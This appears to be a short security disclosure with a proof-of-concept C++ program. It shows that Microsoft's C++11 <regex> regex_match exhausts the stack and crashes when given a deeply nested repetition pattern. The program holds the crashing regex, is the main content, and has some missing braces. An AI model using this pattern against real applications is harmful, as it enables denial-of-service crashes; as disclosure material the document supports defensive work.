Microsoft C++11 <regex> 'regex_match' function Stack Overflow
Auhor: Maksymilian Arciemowicz
Tested on: Windows 10 and Visual Studio 2013

The Microsoft C++11 <regex> does not properly control the amount of recursion that takes place, which consumes excessive resources of stack. 

Expected 'error_type':
error_stack	there was not enough memory to perform a match

Crash due stack exhaustion

#include "stdafx.h"
#include <regex> 
#include <iostream> 

using namespace std;

int _tmain(int argc, _TCHAR* argv[])

	const char *first = "abc abc abc abc abc abc abc abc abc";
	const char *last = first + strlen(first);
	cmatch narrowMatch;

	regex rx("((((((((.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*)");
	bool found = regex_match(first, last, narrowMatch, rx);

	return 0;
